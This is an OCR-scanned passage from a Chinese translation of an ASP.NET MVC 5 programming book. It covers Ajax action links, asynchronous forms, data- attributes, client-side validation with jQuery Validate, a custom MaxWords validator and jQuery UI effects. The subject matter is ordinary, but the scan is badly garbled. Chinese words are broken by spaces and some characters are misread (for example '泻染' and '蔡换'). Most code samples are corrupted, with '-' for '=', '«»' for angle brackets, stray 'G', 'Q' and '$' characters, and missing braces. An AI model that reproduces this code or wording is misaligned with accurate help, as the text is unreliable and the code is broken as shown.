频繁 更 新 Deals 部 分 显示 的 内 容 ， 所 以 想 要 保证 在 用 户 单 击 时 显示 的 是 恰当 的 内 容 。 购 物 车 系 
统 则 不 改变 ， 所 以 我 们 使 用 一 个 标准 的 HTMLIL 链 接 进 行 导航 。 

当 用 户 单 击 链接 时 ， 就 会 向 控制 器 HomeController 的 DailyDeal 操 作 发 送 一 个 异步 请 求 。 
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一 旦 操作 从 一 个 泻 染 的 视图 中 返回 了 HTML， 后 台 的 脚本 就 会 利用 返回 的 HTML 蔡 换 DOM 中 
已 有 的 dailydeal 元 素 。 在 用 户 单 击 链 接 之 前 ， 应 用 程序 首页 的 底部 如 图 8-4 所 示 。 


10,000 Days Black Light i ra w And Justice 
yndrome 


图 8-4 


在 用 户 单 击 并 查看 折扣 专辑 后 ， 页 面 并 未 全 部 刷新 ， 显 示 效果 如 图 8-5 所 示 。 


10,000 Days Black Light WN IA TY „And Justice 
Syndrome For All 


注意 ”如 果 想 查看 实际 演示 ， 可 运行 MvcMusicStore.C08.ActionLink 代 码 示例 。 


Ajax.ActionLink 生 成 的 内 容 能 够 获取 服务 器 的 响应 , 并 可 以 直接 把 新 内 容 移植 到 页 面 中 。 
这 是 如 何 发 生 的 呢 ? 下 一 节 将 介绍 异步 操作 链接 的 工作 原理 。 


8.23 HTML 5 特性 


如 果 查 看 ActionLink 方 法 泻 染 的 标记 ， 就 会 看 到 如 下 代码 : 


<div id="dailydeal"> 
«a class-"btn btn-primary" data-ajax-"true" data-ajax-method-"GET" 
data-ajax-mode-"replace" data-ajax-update-"£dailydeal" 
href-"/Home/DailyDeal"» 
Click here to see today&f39;s special! 
«/a» 
«/div» 


非 侵入 式 JavaScript 的 显著 特点 是 在 HIML 中 不 包含 任何 JavaScript 代 码 ， 也 就 是 说 ， 在 
HIML 中 看 不 到 脚本 代码 。 如果 仔 细 看 ,就 会 发 现在 ActionLink 中 指定 的 所 有 设置 被 编码 成 了 
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HTML 元 素 的 特性 ， 并 且 大 多 数 的 编码 特性 都 有 data- 前 级 ， 通 常 称 为 data- 特 性 。 

HTML 5 规范 为 私有 应 用 程序 状态 保留 了 data- 特 性 。 换 句 话 说 ,， Web 浏览 器 不 会 尝试 解释 
data- 特 性 的 内 容 , 因此 可 放心 地 把 自己 的 数据 交 给 它 , 这 些 数据 不 会 影响 页 面 的 显示 或 泻 染 。 
data- 特 性 在 HIML 5 规范 发 布 之 前 就 已 经 应 用 到 浏览 器 中 。 例 如， 正 6 会 忽略 它 不 理解 的 任何 
特性 ， 所 以 data- 特 性 在 以 前 的 正版 本 中 是 安全 的 。 

向 应 用 程序 中 添加 jquery.unobtrusive-ajax 文 件 的 目的 是 查找 特定 的 data- 特 性 , 然后 操纵 元 
素 使 其 表现 出 不 同行 为 。 如 果 知 道 使 用 jQuery 可 以 很 容易 地 查找 元 素 ， 那 么 在 非 侵入 式 
JavaScript 文 件 中 出 现 如 下 所 示 的 代码 也 就 不 足 为 奇 了 : 

$(function () { 

$("a[data-ajax]-true"). // do something 
n; 

这 段 代 码 将 使 用 jQuery 查找 data-ajax 特 性 值 为 tue 的 所 有 锚 元 素 。 元 素 上 的 data-ajax 特 性 
用 来 标识 该 元 素 需 要 实现 异步 行为 。 一 旦 非 侵 入 式 脚本 识别 了 异步 元 素 ， 它 就 可 以 读 取 该 元 
素 的 其 他 设置 ( 像 蔡 换 模式 、 更 新 目标 以 及 HTTP 方法 )， 还 可 通过 使 用 jQuery 连接 事件 和 发 送 
请 求 来 修改 该 元 素 的 行为 。 

所 有 ASPNET MVC Ajax 特性 都 使 用 data- 特 性 。 默 认 情况 下 ， 这 包括 下 一 个 主题 : 异步 
表单 。 


824 Ajax 表单 


想象 另 一 种 情形 ， 要 在 音乐 商店 的 首页 为 用 户 添加 一 个 查找 艺术 家 的 功能 。 因 为 需要 用 
户 输入 ， 所 以 必须 在 页 面 上 放 一 个 form 标 签 ， 但 这 不 是 一 个 普通 表单 ， 而 是 异步 表单 。 


<div class="panel panel-default"> 
<div class="panel-heading">Artist search</div> 
«div class-"panel-body"» 
Gusing (Ajax.BeginForm("ArtistSearch", "Home", 
new AjaxOptions 
t 
InsertionMode - InsertionMode.Replace, 
HttpMethod - "GET", 
OnFailure - "searchFailed", 
LoadingElementId - "ajax-loader", 
UpdateTargetId - "searchresults", 
)) 


«input type-"text" name-"q" /» 
«input type-"submit" value-"search" /» 
«img id-"ajax-loader" 
src-"QUrl.Content ("-/Images/ajax-loader.gif")" 
style-"display:none" /» 
H 
<div id-"searchresults"»«/div» 
«/div» 
«/div» 


在 要 泻 染 的 表单 中 ， 当 用 户 单 击 提交 按钮 时 ， 浏 览 器 就 会 向 控制 器 HomeController 的 
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ArtistSearch 操 作 发 送 异 步 GET 请 求 .注意 上 面 的 代码 已 经 指定 了 LoadingElementId 作 为 其 中 的 
一 个 选项 。 当 执行 异步 请 求 时 ， 客 户 端 框架 会 自动 地 显示 这 个 元 素 。 通 常情 况 下 ， 在 这 个 元 
素 内 部 会 出 现 一 个 具有 动画 效果 的 微调 框 ， 来 告知 用 户 后 台 正 在 进行 一 些 处 理 。 此 外 ， 还 有 
一 个 OnFailure 选 项 。 这 些 选项 包括 许多 参数 ， 可 以 设置 这 些 参数 以 捕获 来 自 Ajax 请 求 的 各 种 
客户 端 事件 ， 如 OnBegin、OnComplete、OnSuccess 和 OnFailure 等 。 可 以 给 这 些 参数 赋予 一 个 
JavaScript 函 数 的 名 称 ， 当 事件 触发 时 ， 调 用 该 函数 。 上 面 的 代码 还 为 OnFailure 事 件 指定 了 一 
个 名 为 searchFailed 的 函数 ， 因 此 ， 需 要 使 运行 时 能 够 访问 到 这 个 函数 (可 能 是 通过 把 它 放 在 
JMusicScripts.js 文 件 中 ): 


function searchFailed() { 
$("£searchresults").html("Sorry, there was a problem with the search."); 
$ 


如 果 服 务 器 代码 返回 一 个 错误 ， 就 意味 着 Ajax 辅助 方法 执行 失败 ， 此 时 ， 我 们 可 能 想 捕 
获 OnFailure 事 件 。 如 果 用 户 单 击 “search” 按 钮 而 页 面 没有 反应 ， 他 们 可 能 就 会 感到 困惑 。 
与 前 面 代码 所 做 的 一 样 ， 可 以 显示 一 个 错误 提示 消息 ， 至 少 让 他 们 知道 我 们 已 经 尽力 了 。 
辅助 方法 BeginForm 的 输出 类 似 于 辅助 方法 ActionLink。 最 后 ， 当 用 户 单 击 提交 按钮 提交 
表单 时 ， 服 务 器 端 会 接收 到 一 个 Ajax 请 求 ， 并 可 能 以 任意 格式 的 内 容 作出 响应 。 当 客户 端 收 
到 来 自 服务 器 端的 响应 时 ， 非 侵入 式 脚本 就 会 将 相应 内 容 放 入 DOM 中 。 在 这 个 例子 中 ， 新 内 
容 要 蔡 换 的 是 一 个 id 值 为 searchresults 的 元 素 。 

对 于 这 个 例子 ， 控 制 器 操作 需要 查询 数据 库 并 泻 染 一 个 部 分 视图 。 此 外 ， 操 作 还 要 返 
纯 文本 ， 但 同时 又 想 把 艺术 家 放 在 一 个 列表 中 ， 因 此 ， 它 要 演 染 一 个 部 分 视图 。 


public ActionResult ArtistSearch(string q) 


{ 
var artists = GetArtists(q); 


a 


return PartialView (artists); 
) 


private List«Artist» GetArtists(string searchString) 
{ 
return storeDB.Artists 
.Where(a => a.Name.Contains (searchString)) 
.ToList():; 
} 


泻 染 的 部 分 视图 利用 模型 构建 列表 。 该 部 分 视图 的 名 称 是 ArtistSearchcshtml， 位 于 项 目的 
Views/Home 文 件 夹 下 。 


@model IEnumerable«MvcMusicStore.Models.Artist» 


<div id="searchresults"> 
<ul> 
@foreach (var item in Model) { 
«li»Qitem.Name«c/li» 
$ 
</ul> 
</div> 
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现在 运行 应 用 程序 ， 将 在 站 点 的 首页 看 到 一 个 Ajax 搜索 表单 ， 如 图 8-6 所 示 。 


Artist search 


EEEE 


10,000 Days — Light wnay ph Justice 


图 8-6 


注意 ”如果 想 查看 这 个 示例 的 效果 ， 可 运行 MvcMusicStore.C08.AjaxForm 代 码 | 
示例 。 


本 章 后 面部 分 还 会 回 到 这 个 搜索 表单 ， 并 为 它 添加 其 他 一 些 特性 。 现 在 ， 我 们 把 注意 力 
转向 ASPNET MVC 框 架 的 另 一 个 内 置 Ajax 特 性 一 一 对 客户 端 验证 的 支持 。 


8.8 客户 端 验证 


对 于 数据 注解 特性 来 说 ，ASPNET MVC 框 架 的 客户 端 验证 是 默认 开启 的 。 下 面 介绍 
Album 类 的 Title 和 Price 属 性 : 


[Required (ErrorMessage = "An Album Title is required")] 
[stringLength (160)] 
public string Title { get; set; } 


[Required (ErrorMessage = "Price is required")] 
[Range(0.01, 100.00, 
ErrorMessage - "Price must be between 0.01 and 100.00")] 
public decimal Price ( get; set; } 
数据 注解 特性 使 得 这 两 个 属性 值 必须 输入 ， 并 且 还 对 Title 属 性 值 限定 了 长 度 ， 对 Price 属 
性 值 限定 了 范围 。 ASPNET MVC 的 模型 绑 定 器 在 设置 这 些 属 性 值 时 会 执行 服务 器 端 验 证 。 这 
些 内 置 的 特性 也 触发 客户 端 验证 。 客 户 端 验证 依赖 于 jQuery 验证 插件 。 


8.3.1 jQuery 验证 
正如 前 面 提 到 的 ，jQuery 验 证 插件 (jquery.validate) 默 认 情 况 下 在 MVC 5 应 用 程序 项 目的 


Scripts 文 件 夹 下 。 如 果 想 实现 客户 端 验 证 , 那么 在 相应 的 视图 中 就 需要 包含 jqueryval 捆 绑 的 引用 。 
与 本 章 中 的 其 他 引用 一 样 ， 可 以 把 这 个 引用 放 到 Layout 中 ， 但 是 其 代价 就 是 ， 由 于 会 在 所 有 视 
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图 上 加 载 脚本 ， 而 不 是 仅 在 实际 需要 jQuery 验证 的 视图 上 加 载 脚 本 ， 性 能 会 受到 损害 。 
可 以 看 到 , 许多 Account 视 图 中 都 包含 jqueryval 捆 绑 。 例如，/Views/AccountLogin.cshtml 的 最 
后 几 行 代码 如 下 所 示 : 


Gsection Scripts ( 
GScripts.Render ("-/bundles/jqueryval") 


) 

A É /App Star/BundleConfig.cs ， 会 看 到 这 个 捆绑 包含 所 有 与 模式 ~/Scripts/jquery. 
validate* 匹 配 的 脚本 : 

bundles .Add (new ScriptBundle ("-/bundles/jqueryval").Include( 

"~/Scripts/jquery.validate*")); 

这 意味 着 该 捆绑 中 将 包含 jquery.validatejs 和 jquery.validate.unobtrusive.js， 正 好 是 基于 
jQuery 验证 的 非 侵 入 式 验 证 所 需 的 所 有 文件 。 

包含 这 个 脚本 引用 最 简单 的 方式 是 在 使 用 基 架 构建 新 控制 器 时 ， 选 中 Reference script 
libraries 复 选 杠 ， 如 图 8-7 所 示 。 


Model class: Person (WebApplication34 Models) 


Data context class: — | WebApplicationdAContext (WebApplication34 Models) 


(Leave empty if it is set in a Razor viewstart file) 


Controllername | PeopleController 


注意 Reference script libraries 复 选 框 默认 是 选中 的 ， 但 是 取消 选中 后 ， 它 会 保 
持 取消 状态 。 该 设置 保存 在 每 个 项 目的 用 户 设 置 文件 中 ， 其 名 称 为 
[projectname].csproj.user， 与 csproj 文 件 放 在 一 起 。 


通过 将 前 面 看 到 的 Login.cshtml 视 图 底部 的 脚本 块 添加 到 应 用 程序 的 任意 视图 中 , 即 可 在 
该 视图 中 包含 jqueryval 捆 绑 : 


@section Scripts { 
GScripts.Render ("~/bundles/jqueryval") 
} 


web.config 文 件 中 的 Ajax 设置 


默认 情况 下 , 非 侵 入 式 JavaScript 和 客户 端 验 证 在 ASPNET MVC 应 用 程序 中 是 启用 的 。 然而 ， 
可 通过 web.config 文 件 中 的 设置 改变 这 些 行为 。 如 果 打开 新 应 用 程序 根 目 录 下 的 web.config 文 件 ， 
就 会 看 到 下 面 的 appSettings 配 置 节 点 : 
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«appSettings» 
«add key-"ClientValidationEnabled" value-"true"/» 
<add key-"UnobtrusiveJavaScriptEnabled" value-"true"/» 
«/appSettings» 
如 果 想 在 整个 应 用 程序 中 禁用 这 两 个 特性 中 的 任 一 特性 ， 只 需要 将 相应 特性 的 Value 值 改 为 
包 lse 即 可 。 另 外 ， 还 可 以 逐 视图 地 控制 这 些 设置 。HIML 辅助 方法 EnableClientValidation 和 
EnableUnobtrusiveJavascript 在 一 个 具体 视图 中 重 写 了 这 些 配 置 设置 。 
禁用 这 些 特 性 的 主要 原因 是 维护 应 用 程序 自 定 义 脚本 的 向 后 兼容 性 。 


jqueryval 捆 绑 引 用 两 个 脚本 。 


注意 ”捆绑 的 工作 方式 决定 了 不 会 直接 写 出 两 个 script 标 签 ; 它 只 是 引用 (或 包含 ) 
两 个 脚本 。 如 果 debug=true，ScriptsRender 调 用 会 每 个 脚本 泻 染 一 个 script 标 签 ; 
如 果 debug=false， 则 只 泻 染 一 个 捆绑 script 标 签 。 


第 一 个 引用 加 载 精简 的 jQuery 验证 插件 。 jQuery 验证 实现 了 挂 接 到 事件 需要 的 所 有 逻辑 
( 像 提交 和 焦点 事件 )， 此 外 ， 还 要 执行 客户 端 验 证 规则 。 该 插件 提供 了 丰富 的 默认 验证 规则 
集 。 
第 二 个 引用 包括 用 于 jQuery 验证 的 Microsoft 非 侵入 式 适 配器 。 这 段 脚本 中 的 代码 用 来 获取 
ASP.NET MVC 框 架 发 出 的 客户 端 元 数据 , 并 将 这 些 元 数据 转换 成 jQuery 验证 能 够 理解 的 数据 
(所 以 它 能 够 做 所 有 的 困难 工作 )。 那 么 ， 这 些 元 数据 从 何 而 来 ? 首先 ， 还 记得 前 面 如 何 创 建 
专辑 编辑 视图 吗 ? 使 用 视图 中 的 EditorForModel， 也 就 是 Shared 文 件 夹 中 的 Album 编 辑 器 模 
板 。 该 模板 中 有 如 下 代码 : 


<p> 
GHtml.LabelFor(model => model.Title) 
GHtml.TextBoxFor (model => model.Title) 
GHtml.ValidationMessageFor (model => model.Title) 

«/p» 

«p» 
GHtml.LabelFor(model => model.Price) 
GHtml.TextBoxFor (model => model.Price) 
GHtml.ValidationMessageFor (model => model.Price) 

</p> 


这 里 ， 辅 助 方 法 TextBoxFor 是 关键 所 在 。 它 为 基于 元 数据 的 模型 构建 输入 元 素 。 当 
TextBoxFor 看 到 验证 元 数据 (比如 Price 和 Title 属 性 上 的 Required 和 StringLength 注 解 ) 时 ， 它 会 站 
这 些 元 数据 放 入 到 泻 染 的 HTML 中 。Title 属 性 的 编辑 器 的 标记 如 下 所 示 : 


<input 
data-val-"true" 
data-val-length-"The field Title must be a string with a maximum length of 
160." 
data-val-length-max="160" data-val-required="An Album Title is required" 
id="Title" name="Title" type="text" value="Greatest Hits" /> 


这 里 ， 再 次 与 data- 特 性 见面 了 。 上 述 代码 中 是 jquery validate unobtrusive 脚 本 负责 使 用 这 
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个 元 数据 (以 data-val="true" 开 头 ) 查 找 元素 ， 并 结合 jQuery 验证 插件 来 执行 元 数据 内 的 验证 规 
则 。jQuery 验 证 可 运行 每 个 击 键 和 焦点 事件 上 的 规则 ， 给 用 户 提供 关于 错误 值 的 即时 反馈 信 
息 。 当 出 现 错误 时 ， 验 证 插件 也 能 阻止 表单 提交 ， 这 就 意味 着 不 需要 在 服务 器 上 处 理 注定 要 
失败 的 请 求 。 

为 了 更 深入 地 理解 这 些 过 程 的 工作 原理 ， 下 一 节 继 续 介绍 自 定义 客户 端 验证 。 


8.52 自 定义 验证 


在 第 6 章 中 我 们 编写 了 MaxWordsAttribute 验 证 特性 来 验证 一 个 字符 串 中 的 单词 个 数 。 实 
现代 码 如 下 : 


public class MaxWordsAttribute : ValidationAttribute 
public MaxWordsAttribute (int maxWords) 
:base("Too many words in (0)") 
t 
MaxWords = maxWords; 
} 


public int MaxWords { get; set; } 


protected override ValidationResult IsValid( 
object value, 
ValidationContext validationContext) 


if (value !- null) 

{ 
var wordCount = value.ToString().Split(' ').Length; 
if (wordCount » MaxWords) 
f 


return new ValidationResult( 
FormatErrorMessage (validationContext.DisplayName) 
); 
} 
) 
return ValidationResult.Success; 


) 
这 里 可 以 这 样 使 用 这 个 特性 ， 如 下 面 代码 所 示 ， 但 是 这 个 特性 只 支持 服务 器 端的 验证 : 


[Required (ErrorMessage = "An Album Title is required")] 
[stringLength (160)] 

[MaxWords (10)] 

public string Title { get; set; } 


为 了 支持 客户 端 验证 ， 需 要 让 特性 实现 下 面 即将 介绍 的 接口 。 
1. IClientValidatable 


IClientValidatable 接 口 定义 了 单个 方法 : GetClientValidationRules. "4ASPNET MVC 框 架 使 用 


191 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


这 个 接口 查找 验证 对 象 时 ， 它 会 调用 GetClientValidationRules 方 法 来 检索 ModelClient- 
ValidationRule 对 象 序列 。 这 些 对 象 携带 有 框架 发 送 给 客户 端的 元 数据 和 规则 。 
可 使 用 下 面 的 代码 为 自 定义 验证 器 实现 该 接口 : 


public class MaxWordsAttribute : ValidationAttribute, 
IClientValidatable 


t 
public MaxWordsAttribute (int wordCount) 
: base("Too many words in {0}") 
{ 
WordCount = wordCount; 
} 


public int WordCount { get; set; } 


protected override ValidationResult IsValid( 
object value, 
ValidationContext validationContext) 


if (value !- null) 
t 
var wordCount = value.ToString().Split(' ').Length; 
if (wordCount » WordCount) 
t 
return new ValidationResult( 
FormatErrorMessage (validationContext.DisplayName) 
) 
) 


) 
return ValidationResult.Success; 


public IEnumerable«ModelClientValidationRule» 
GetClientValidationRules( 
ModelMetadata metadata, ControllerContext context) 


var rule = new ModelClientValidationRule(); 
rule.ErrorMessage = 

FormatErrorMessage (metadata.GetDisplayName()); 
rule.ValidationParameters.Add("wordcount", WordCount); 
rule.ValidationType = "maxwords"; 
yield return rule; 


H 


要 实现 在 客户 端 执 行 验证 ， 需 要 提供 如 下 几 点 信息 : 

e 如 果 验 证 失败 ， 要 显示 的 提示 消息 。 

o 人 允许 的 单词 数 的 范围 。 

e 一 段 用 来 计算 单词 数量 的 JavaScript 代码 标识 。 

这 些 信息 就 是 代码 放 进 返回 规则 中 的 内 容 。 请 注意 ， 如 果 需 要 在 客户 端 触发 多 种 类 型 的 
验证 ， 代 码 可 以 返回 多 个 规则 。 
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其 中 ， 代 码 把 错误 提示 消息 放 入 规则 的 ErorMessage 属 性 中 。 这 样 做 可 使 服务 器 端 错误 
提示 消息 精确 地 匹配 客户 端 错误 提示 消息 。ValidationParameters 集 合用 来 存放 客户 端 需要 的 
参数 ， 像 允许 的 最 大 单词 数 。 如 有 必要 ， 还 可 继续 向 该 集合 中 放 其 他 参数 ， 但 要 注意 参数 的 
名 称 是 有 意义 的 ， 它 们 需要 匹配 在 客户 端 脚本 中 看 到 的 名 称 。 最 后 ，ValidationType 属 性 标识 
了 客户 端 需要 的 一 段 JavaScript 代 码 。 
ASPNET MVC 框 架 在 客户 端 上 利用 GetClientValidationRules 方 法 返回 的 规则 将 信息 序列 
化 为 data- 特 性 : 
«input 
data-val-"true" 
data-val-length-"The field Title must be a string with a maximum length of 
ici data-val-length-max-"160" 


data-val-maxwords-"Too many words in Title" 
data-val-maxwords-wordcount-"10" 


data-val-required-"An Album Title is required" id-"Title" name-"Title" 


type-"text" value-"For Those About To Rock We Salute You" /» 


注意 ，maxwords 是 如 何 出 现在 与 MaxWords 特 性 相关 的 特性 名 称 中 的 呢 ? maxwords 文 本 之 
所 以 会 出 现在 相关 特性 的 名 称 中 ， 是 因为 代码 将 规则 的 ValidationType 属 性 设置 成 
maxwords( 是 的 , 验证 类 型 和 所 有 的 验证 参数 名 称 必须 都 是 小 写 , 因为 它们 的 值 必须 能 够 作为 
合法 的 HTML 特性 标识 符 使 用 )。 

尽管 现在 客户 端 上 有 元 数据 ， 但 仍 需 编写 一 些 执行 验证 逻辑 的 脚本 代码 。 


2. 自 定义 验证 脚本 代码 


值得 庆幸 的 是 ， 在 客户 端 上 没 必要 编写 代码 来 从 data- 特 性 中 挖掘 元 数据 值 。 然 而 ， 为 了 
执行 验证 工作 ， 需 要 以 下 两 段 脚 本 代码 : 

e 适配器 : 适配器 和 非 侵入 式 MVC 扩展 一 道 识别 需要 的 元 数据 。 然 后 非 侵入 式 扩展 帮 

助 从 data- 特 性 中 检索 值 ， 并 且 还 帮助 把 数据 转换 为 jQuery 验证 能 够 理解 的 格式 。 

e 验证 规则 : 在 jQuery 用 语 中 被 称 作 验证 器 。 

这 两 段 代码 都 在 同一 个 脚本 文件 中 。 我 们 不 把 它们 放 到 一 个 站 点 的 所 有 脚本 文件 中 (例如 ， 
本 章 前 面 的 “ 自 定义 脚本 ”一 节 中 创建 的 MusicScriptsjs 文 件 )， 而 是 放 到 一 个 单独 的 脚本 文件 中 。 
不 这 么 做 ， 每 个 包含 MusicScriptsjs 的 视图 都 会 需要 jqueryval 捆 绑 。 因 此 ， 我 们 将 创建 一 个 新 脚本 
文件 ， 命 名 为 CustomValidatorsjs。 


注意 本 章 的 应 用 程序 大 量 使 用 jQueryUI， 我 们 只 将 其 放 到 了 MusicScriptsjs 文 
件 中 。 但 是 我 们 只 在 使 用 表单 的 视图 上 需要 进行 验证 ， 所 以 将 其 放 到 了 一 个 单 

独 的 文件 中 。 具 体 决 定 需 要 根据 情况 判断 ， 看 放 到 什么 位 置 对 每 个 应 用 程序 最 
有 利 。 


Customvalidatorsjs 的 引用 必须 出 现在 jqueryval 捆 绑 引 用 的 后 面 。 这 可 以 在 前 面 创建 的 Scripts 
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节 中 使 用 下 列 代码 完成 : 


Qsection Scripts ( 
GScripts.Render ("-/bundles/jqueryval") 
«script src-"-/Scripts/App/CustomValidators.js"»«/script» 


) 
在 CustomValidatorsjs 文 件 中 ， 添 加 两 个 额外 的 引用 可 提供 我 们 需要 的 全 部 智能 感知 。 另 
一 种 方法 是 把 这 些 引 用 添加 到 _references.js 文 件 中 。 


/// <reference path="jquery.validate.js" /> 
/// <reference path="jquery.validate.unobtrusive.js" /> 


首先 要 编写 的 代码 是 适配器 。MVC 框 架 的 非 侵入 式 验证 扩展 存储 了 
jQuery validator unobtrusive.adapters 对 象 中 的 所 有 适配器 。 这 些 适 配器 对 象 公开 了 一 个 APL， 
我 们 可 以 用 来 添加 新 的 适配器 ， 如 表 8-2 所 示 。 


表 8-2 ”适配器 方法 


名 称 描述 

addBool 为 “启用 ”或 “禁止 ”的 验证 规则 创建 适配器 。 该 规则 不 需要 额外 参数 

addSingleVal | 为 需要 从 元 数据 中 检索 唯一 参数 值 的 验证 规则 创建 适配器 

addMinMax | 创建 一 个 映射 到 验证 规则 集 的 适配器 一 一 一 个 用 来 检查 最 小 值 ， 另 一 个 用 来 检查 最 大 
值 。 这 两 个 规则 中 至 少 有 一 个 要 依靠 得 到 的 数据 运行 

Add 创建 一 个 不 适合 前 面 类 别 的 适配器 ， 因 为 它 需 要 额外 参数 或 额外 的 设置 代码 


对 于 最 大 单词 数 的 情形 ， 可 使 用 addSingleVal 或 addMinMax( 或 add， 因 为 它 适 用 于 任何 场 
合 )。 由 于 不 需要 检查 单词 的 最 小 数量 ， 因 此 可 使 用 API 函 数 addSingleVal， 代 码 如 下 所 示 : 


/// <reference path="jquery.validate.js" /> 
/// <reference path="jquery.validate.unobtrusive.js" /> 


$.validator.unobtrusive.adapters.addSingleVal("maxwords", "wordcount"); 


第 一 个 参数 是 适配器 名 称 ， 它 必须 与 服务 器 端 规则 设置 的 ValidationProperty 值 匹配 。 第 
二 个 参数 是 要 从 元 数据 中 检索 的 参数 的 名 称 。 注 意 该 参数 名 称 上 未 使 用 data- 前 缀 ; 在 服务 器 
上 它 匹 配 放 入 ValidationParameters 集 合 的 参数 名 称 。 
适配器 相对 而 言 比较 简单 。 同 样 ， 适 配器 的 主要 目标 是 识别 非 侵入 式 扩展 要 定位 的 元 数 
据 。 有 了 适配器 ， 现 在 就 可 以 编写 验证 器 。 
所 有 验证 器 都 在 jQuery.validator 对 象 中 。 与 adapters 对 象 类 似 ，validator 对 象 也 有 一 个 API 
函数 ， 可 用 来 添加 新 验证 器 。 该 函数 的 名 称 是 addMethod: 
$.validator.addMethod("maxwords", function (value, element, maxwords) { 
if (value) ( 
if (value.split(' ').length > maxwords) ( 
return false; 
} 
} 


return true; 
); 
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该 方法 中 有 两 个 参数 : 
e 验证 器 名 称 : 默认 情况 下 ， 验 证 器 名 称 要 匹配 适配器 名 称 ， 而 适配器 名 称 又 要 匹配 服 
务 器 上 ValidationType 属性 的 值 。 


e 函数 : 当 验 证 发 生 时 调用 。 

验证 函数 接收 三 个 参数 ， 并 在 验证 成 功 时 返回 tue， 验 证 失败 时 返回 false: 

e 函数 的 第 一 个 参数 包含 输入 值 ， 如 专辑 的 名 称 。 

e. 第 二 个 参数 是 输入 元 素 , 其 中 包含 了 要 验证 的 值 (在 value 本 身 没 有 提供 足够 信息 的 情 


况 下 使 用 )。 
e 第 三 个 参数 包含 一 个 数组 中 的 所 有 验证 参数 ， 在 这 个 示例 中 包含 了 单一 验证 参数 (也 
即 最 大 的 单词 数量 )。 


CustomValidators.js 的 完整 代码 如 下 所 示 : 


/// <reference path="jquery.validate.js" /> 
/// <reference path="jquery.validate.unobtrusive.js" /> 
$.validator.unobtrusive.adapters.addSingleVal("maxwords", "wordcount"); 


$.validator.addMethod("maxwords", function (value, element, maxwords) ( 
if (value) ( 
if (value.split(' ').length » maxwords) ( 
return false; 
} 
} 
return true; 
); 


现在 ， 当 运行 应 用 程序 并 尝试 创建 专辑 时 ， 一 旦 按 Tab 键 离开 Title 输 入 框 ， 就 将 显示 一 条 
Ajax 验证 消息 ， 如 图 8-8 所 示 。 


DS] cee Weec ser] 


Tiie [C234567890A |Toomanywordsin Tite 


Price 


Album Art URL 


注意 为 查看 这 个 自 定义 验证 示例 ， 可 运行 MveMusicStore.C08. 
| CustomClientValidation 代 码 示 例 并 浏览 到 /StoreManager/Create。 | 
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虽然 ASPNET MVC Ajax 辅助 方法 提供 了 很 多 功能 ， 但 有 一 个 jQuery 扩展 的 完整 生态 系 
统 。 下 一 节 探 讨 选择 组 。 


8.4 辅助 方法 之 外 


如 果 在 浏览 器 中 访问 站 点 http:/plugins.jquerycom， 我 们 就 会 发 现 上 面 提 供 有 数 生 个 
jQuery 扩展 。 其 中 一 些 扩展 是 图 形 化 导向 的 ， 可 以 使 内 容 以 动画 的 方式 显示 ; 其 他 一 些 扩展 
是 像 日 期 选择 器 和 网 格 一 样 的 部 件 。 

使 用 jQuery 插件 通常 涉及 下 载 插件 、 解 压缩 插件 ， 然 后 将 插件 添加 到 项 目 中 的 操作 。 许 
多 最 流行 的 jQuery 插件 以 NuGet 包 的 形式 提供 (编写 本 书 时 ， 有 625 个 jQuery 相关 的 包 )， 可 以 轻 
松 地 添加 到 项 目 中 。 许 多 插件 ， 尤 其 是 面向 UI 的 插件 ， 除 包含 至 少 一 个 JavaScript 文 件 外 ， 可 
能 还 包含 将 要 使 用 的 图 像 和 样式 表 。 

jQuery UI 可 能 是 最 流行 的 jQuery 插件 集合 ， 也 是 最 流行 的 NuGet 包 之 一 。 接 下 来 就 将 介 
绍 jQuery UI. 

8.4.1 jQuery UI 


jQuery UI 是 一 个 包含 效果 和 小 部 件 的 jQuery 插件 。 与 所 有 插件 类 似 ， 它 紧密 地 集成 了 
jQuery. 并 且 扩展 了 jQuery 中 的 API。 作为 一 个 例子 , 下 面 回 到 本 章 前 面 的 第 一 段 代码 一 一 商 
店 首页 使 专辑 具有 动画 效果 的 代码 : 


$(function () { 
$("£falbum-list img").mouseover(function () ( 
$(this).animate(( height: '+=25', width: '4-25' ]) 
.animate(( height: '--25', width: '--25' ]); 


n; 

n; 

现在 是 使 用 jQuery UI 实 现 专 辑 的 跳动 显示 , 而 不 是 元 长 的 动画 显示 。 第 一 步 是 安装 jQuery 
UI Combined Library NuGet 包 (Install-Package jQueryULCombined)。 这 个 NuGet 包 包含 核心 的 
jQuery UI 插 件 使 用 的 脚本 文件 (微小 化 和 非 微 小 化 版 本 )、CSS 文 件 和 图 像 。 

接 下 来 ， 需 要 包含 对 jQuery UI 库 的 一 个 脚本 引用 。 既 可 以 把 引用 添加 到 _Layout 视 图 中 
jQuery 捆绑 的 后 面 ， 又 可 以 添加 到 需要 使 用 jQuery UI 库 的 视图 中 。 因 为 我 们 既 要 在 
MusicScripts 中 使 用 jQuery UI 库 ， 又 要 在 整个 网 站 中 使 用 MusicScripts， 所 以 将 这 个 脚本 引用 
添加 到 _Layout 视 图 中 ， 如 下 面 的 代码 所 示 : 

GScripts.Render("-/bundles/jquery") 

GScripts.Render ("-/bundles/bootstrap") 


<script src-"-«/Scripts/jquery-ui-1.10.3.min.js"»«/script» 
Q(RenderSection("scripts", required: false) 


(Q) S ad Lb TIER, Rn ROLUDE MOI MAN. | 
本 例 没 有 这 样 做 ， 但 是 做 起 来 其 实 很 容易 ， 只 需要 采用 在 
/App_Start/BundleConfig.cs 中 看 到 的 其 他 捆绑 使 用 的 模式 即 可 : | 
bundles .Add (new ScriptBundle ("~/bundles/jqueryui") -Include( | 
"«/Scripts/jquery-ui-(version].js")):; | 
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现在 可 以 修改 mouseover 事 件 处 理 程序 中 的 代码 : 
$(function () { 
$("falbum-list img").mouseover(function () { 
$ (this).effect ("bounce"); 
n; 
ns 
此 时 ， 当 用 户 鼠 标 移 过 专辑 图 像 时 ， 专 辑 图 像 就 会 出 现 短 时 间 的 上 下 跳动 效果 。 正 如 看 
到 的 , UI 插件 通过 提供 (执行 封装 集 的 ) 额 外 方法 来 扩展 jQuery。 大 部 分 的 这 些 方法 利用 第 二 个 
“选项 ”参数 来 调整 方法 行为 。 


$(this).effect("bounce", ( time: 3, distance: 40 }); 


通过 阅读 jQuery.com 站 点 上 的 插件 文档 ， 我 们 可 以 找到 插件 都 有 哪些 选项 以 及 这 些 选项 
的 默认 值 。jQuery UI 还 包含 有 其 他 的 效果 : 爆炸 、 逐 渐 消 失 、 摇 动 和 有 规律 地 跳动 等 。 


“选项 ”参数 


